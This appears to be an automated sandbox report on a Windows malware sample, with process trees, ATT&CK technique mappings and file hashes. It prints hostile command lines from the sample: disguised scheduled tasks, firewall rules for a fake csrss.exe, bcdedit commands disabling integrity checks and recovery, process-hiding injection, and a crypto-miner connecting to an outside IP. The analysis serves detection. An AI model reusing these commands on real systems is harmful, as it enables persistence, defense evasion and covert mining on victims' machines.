1920	MicrosoftUP.exe
1920	MicrosoftUP.exe
1920	MicrosoftUP.exe
2256	MicrosoftUP.exe
2256	MicrosoftUP.exe
2256	MicrosoftUP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7427.exe7427.exe7427.exe7427.exebuild2.exebuild3.exebuild3.exe

description	pid	process	target process
PID 1216 wrote to memory of 2652	1216		7427.exe
PID 1216 wrote to memory of 2652	1216		7427.exe
PID 1216 wrote to memory of 2652	1216		7427.exe
PID 1216 wrote to memory of 2652	1216		7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2652 wrote to memory of 2568	2652	7427.exe	7427.exe
PID 2568 wrote to memory of 3012	2568	7427.exe	icacls.exe
PID 2568 wrote to memory of 3012	2568	7427.exe	icacls.exe
PID 2568 wrote to memory of 3012	2568	7427.exe	icacls.exe
PID 2568 wrote to memory of 3012	2568	7427.exe	icacls.exe
PID 2568 wrote to memory of 304	2568	7427.exe	7427.exe
PID 2568 wrote to memory of 304	2568	7427.exe	7427.exe
PID 2568 wrote to memory of 304	2568	7427.exe	7427.exe
PID 2568 wrote to memory of 304	2568	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 304 wrote to memory of 2984	304	7427.exe	7427.exe
PID 2984 wrote to memory of 1520	2984	7427.exe	build2.exe
PID 2984 wrote to memory of 1520	2984	7427.exe	build2.exe
PID 2984 wrote to memory of 1520	2984	7427.exe	build2.exe
PID 2984 wrote to memory of 1520	2984	7427.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 1520 wrote to memory of 1212	1520	build2.exe	build2.exe
PID 2984 wrote to memory of 1856	2984	7427.exe	build3.exe
PID 2984 wrote to memory of 1856	2984	7427.exe	build3.exe
PID 2984 wrote to memory of 1856	2984	7427.exe	build3.exe
PID 2984 wrote to memory of 1856	2984	7427.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 1856 wrote to memory of 2916	1856	build3.exe	build3.exe
PID 2916 wrote to memory of 548	2916	build3.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

972 attrib.exe

pid	process
972	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe
"C:\Users\Admin\AppData\Local\Temp\8dec86d0a0c4034b6d688a0610742694517e0d31939c53db11b898c0ba7315c0.exe"
1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2952

C:\Users\Admin\AppData\Local\Temp\7427.exe
C:\Users\Admin\AppData\Local\Temp\7427.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2652

C:\Users\Admin\AppData\Local\Temp\7427.exe
C:\Users\Admin\AppData\Local\Temp\7427.exe
2⤵
- DcRat
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\c5abf4a2-0901-4389-b809-99ee19eae036" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:3012

C:\Users\Admin\AppData\Local\Temp\7427.exe
"C:\Users\Admin\AppData\Local\Temp\7427.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:304

C:\Users\Admin\AppData\Local\Temp\7427.exe
"C:\Users\Admin\AppData\Local\Temp\7427.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2984

C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build2.exe
"C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1520

C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build2.exe
"C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build2.exe"
6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1452
7⤵
- Loads dropped DLL
- Program crash
PID:2764

C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build3.exe
"C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1856

C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build3.exe
"C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build3.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- DcRat
- Creates scheduled task(s)
PID:548

C:\Users\Admin\AppData\Local\Temp\B80A.exe
C:\Users\Admin\AppData\Local\Temp\B80A.exe
1⤵
- Executes dropped EXE
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 124
2⤵
- Loads dropped DLL
- Program crash
PID:2472

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BBD2.bat" "
1⤵
PID:3036

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:2864

C:\Windows\system32\taskeng.exe
taskeng.exe {185D08D6-9257-44A6-BE4B-04A76411FFD3} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:1532

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:880

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
- Executes dropped EXE
PID:1048

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- DcRat
- Creates scheduled task(s)
PID:352

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2652

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
- Executes dropped EXE
PID:2496

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe -SystemCheck
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1284

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe" -SystemCheck80912
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2256

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe
7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2836

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe
7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\System32\attrib.exe
-o stratum+tcp://185.51.247.210:5040 -u -p x -t 4
4⤵
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
PID:972

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\MicrosoftUP.exe -SystemCheck
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920

C:\Users\Admin\AppData\Local\Temp\C6DB.exe
C:\Users\Admin\AppData\Local\Temp\C6DB.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Users\Admin\AppData\Local\Temp\C6DB.exe
"C:\Users\Admin\AppData\Local\Temp\C6DB.exe"
2⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:320

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:964

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- DcRat
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
4⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1288

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:2784

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:1012

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:1644

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:2644

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:1160

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:2928

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:2708

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:1716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:2068

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:1640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:1548

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:1236

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:1076

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
4⤵
- Executes dropped EXE
PID:2172

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:2112

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
- Executes dropped EXE
PID:2132

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- DcRat
- Creates scheduled task(s)
PID:1628

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
- Executes dropped EXE
PID:1364

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:2960

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
4⤵
- Executes dropped EXE
PID:1096

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
4⤵
- Executes dropped EXE
PID:1652

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240302010201.log C:\Windows\Logs\CBS\CbsPersist_20240302010201.cab
1⤵
- Drops file in Windows directory
PID:112

C:\Users\Admin\AppData\Local\Temp\DE91.exe
C:\Users\Admin\AppData\Local\Temp\DE91.exe
1⤵
- Executes dropped EXE
PID:888

C:\Users\Admin\AppData\Local\Temp\6EF.exe
C:\Users\Admin\AppData\Local\Temp\6EF.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:880

C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
2⤵
PID:3000

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
3⤵
- DcRat
- Creates scheduled task(s)
PID:2256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\6EF.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\6EF.exe" exit)
2⤵
PID:2724

C:\Windows\SysWOW64\timeout.exe
timeout /t 0
3⤵
- Delays execution with timeout.exe
PID:2464

C:\Users\Admin\AppData\Local\Temp\EFB.exe
C:\Users\Admin\AppData\Local\Temp\EFB.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:560

C:\Users\Admin\AppData\Local\Temp\1BE7.exe
C:\Users\Admin\AppData\Local\Temp\1BE7.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2632

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

File and Directory Permissions Modification

T1222

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
98cff2a1c6c8404df06d00cae150a4a1

SHA1
ddc1862720c4622fac2b31e044dcac88149d5827

SHA256
fa078cd84eedc21ac262c07fec104165f6c94a87efb4aadd038442c251c23ae0

SHA512
08acaf2c3b37aea24bd80d9cdb9aa15e600a59a090840f4b17410049faf5141d83fe9f61a71c966cc62d7d97d7d765c34c67e4c01e4a2ab0f27495b6a5e1f622

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
7e2d3c0444dbddaff2804113ff857578

SHA1
fb290c5d3ea273c73d13f83580d8e3342856b1bb

SHA256
4e8f474cbfb92fbfd1020200e6c3ec9e6f1ce3f65bed46a3d736ed2cb37dbf03

SHA512
c9a01df9daf8e3f8d1d8d6a17c22a157e19d6fcd37b73a08631ca969c2335195ded1d70b7172f19365a5f89b3481d9233a4338bfe658ddf7604a2b2344e48da6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
95854c9f905e014941a5bba9137b1a8c

SHA1
1c67bee18735a7e00b4a1df68a392aea433ade12

SHA256
33d1af16b5a02b68e98d5c0d895c58cd3d4a5b642b0aa14cb5371f267f491242

SHA512
4d69cd79355533fad613cc0b50d8b3fe7fdf34062074e3911e37f4b4a9a45524c78643516657ff5bd30f5c941e70d2221313af6b53a904820ca8c9fba1a66a64

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
fdd787e45a3f664c345086698cb33abe

SHA1
58d51e53c5b4e690e6bdd2d2536474980a9dc203

SHA256
b054df575cfdd2eef27912a11f3d281ff0855c88b8954a37ebda7db485f38178

SHA512
276999db9b48eef25a3ca5f192a0a718bfdacc823861b070b1f45d0576323f76a34443cc6f3e551ca6c959cd4779d2742f5adefb9c77dfb60080e6f30afebde1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
6563e3093a8d850fe3897eac675c8fd2

SHA1
9a90d92f6737f66caedec839e49b12e9b18f0b33

SHA256
5f5910a8dd99d2cc8dc820bd6c959b9a9c7b62f486e0d83e83c5f3f5df567666

SHA512
d5b58d943a43635d57a49794e9272aed66f2c5c43f91150ee77feafa8b37aeb653b7fa9679d1761bc0a7f322db9dec414e85c588036b4329606d204bae4f339f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
49be84f9cf8ad8dd1438750fddd9713b

SHA1
983a888233e5a5423eacae1a71477554fbcb6030

SHA256
31916fcfe0689db5d5d48bbf5e0676ba55c56801d7896cad79c850f836ec13aa

SHA512
f37ddcd20a97f64bacee2d1624d1fbe26252058e476604710fb75518ba03822d355d31b15fb6dfaa9ae131853d485f1417b03c933ae8993907fee7af5e23dfc0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
bdf97b2a1d1f5445c3d7952ebd1bc367

SHA1
2af36cf43467af49110b4cbada5ef63bd68447b3

SHA256
25bd5f11476cfe2e723ca83087a7ae1b2a56c30e194d77289dfa57e9727617cf

SHA512
f6761df46338305026031bd53b62003452b03323dfd937da20f103a3df5d608154829bf02766b22f554f3e4c20ef6531cf624e0d2d7ffa7050fa6329f69ab1cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
d3411fdbf995036ef802a0baba3a5b7d

SHA1
12b53f8449ba83cdaa1c9ab081288181000bc375

SHA256
f471030b4f1b9e5e7a5fa7c22a95e12a73261a259bd4c8ec60a80cfb6c716366

SHA512
b70e07e98cb1256e64e43299df71d339ba837a2c142b0051354d0f176a89d4859cc97c8e0a96c7617baf1ed22bccfb20dfda5e2e2f2a6632669065a31d192025

Download Submit
C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build2.exe
Filesize
224KB

MD5
b762794a9d0f0d9104341c7ab77fe729

SHA1
34c5ab4203f943193d35e69e62735e731d5ba67c

SHA256
cec4ad28ffc2d51b345c83dfd79196a437458ccc7aa9e822936b8c0c527bce8a

SHA512
6dc853d218ac1af89341be89e2b9651fc16d869a72496c82a3cbe3729b0330a0a5eb1e89a77618329265d86c30ac42e60f1a0393e3b2d3c72bb90053a5cd05c0

Download Submit
C:\Users\Admin\AppData\Local\4d06cedf-be8d-40ad-98c8-69b2885440fa\build3.exe
Filesize
299KB

MD5
41b883a061c95e9b9cb17d4ca50de770

SHA1
1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad

SHA256
fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408

SHA512
cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EF.exe
Filesize
7.2MB

MD5
c52f19ab347ea1aa330098e782233836

SHA1
cd5899f4edddaddbcee63d4fbeaee3e4678b94ce

SHA256
bb148f7c64d83bb2cfd3681b8f484721bac1099f90b60d06040633459fe9f67f

SHA512
698666f68bd43c1b4e7fb74a58f473983cc359228b68bb2a017e4dc53c8b12541a2aace77b6f6bde5f96c785c4a1e00097f5f1c1a61ba329e313b92bb5b592df

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EF.exe
Filesize
8.9MB

MD5
ee62d754d9f53ea3807e7eebca08d699

SHA1
75726f9d1d05b5c8c94a6e290a034ed246278d49

